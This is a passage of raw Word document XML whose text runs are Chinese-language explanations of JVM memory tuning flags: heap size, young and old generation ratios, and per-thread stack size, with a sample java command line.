          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xmx3550m -Xms3550m -Xmn2g</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xss128k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xmx3550m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大可用内存为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3550M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xms3550m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>促使内存为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3550m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。此值可以设置与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-Xmx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相同，以避免每次垃圾回收完成后</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重新分配内存。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xmn2g</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置年轻代大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2G</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>内存大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>年轻代大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>年老代大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>持久代大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。持久代一般固定大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>64m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，所以增大年轻代后，将会减小年老代大小。此值对系统性能影响较大，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官方推荐配置为整个堆的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3/8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-Xss128k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置每个线程的堆栈大小。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDK5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以后每个线程堆栈大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，以前每个线程堆栈大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>256K</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。更具应用的线程所需内存大小进行调整。在相同物理内存下，减小这个值能生成更多的线程。但是操作系统对一个进程内的线程数还是有限制的，不能无限生成，经验值在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3000~5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>左右。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1527" w:rsidRDefault="006F1527" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java -Xmx3550m -Xms3550m -Xss128k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-XX:NewRatio=4 -XX:SurvivorRatio=4 -XX:MaxPermSize=16m -XX:MaxTenuringThreshold=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-XX:NewRatio=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置年轻代（包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区）与年老代的比值（除去持久代）。设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则年轻代与年老代所占比值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，年轻代占整个堆栈的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1/5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-XX:SurvivorRatio=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置年轻代中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区的大小比值。设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区与一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
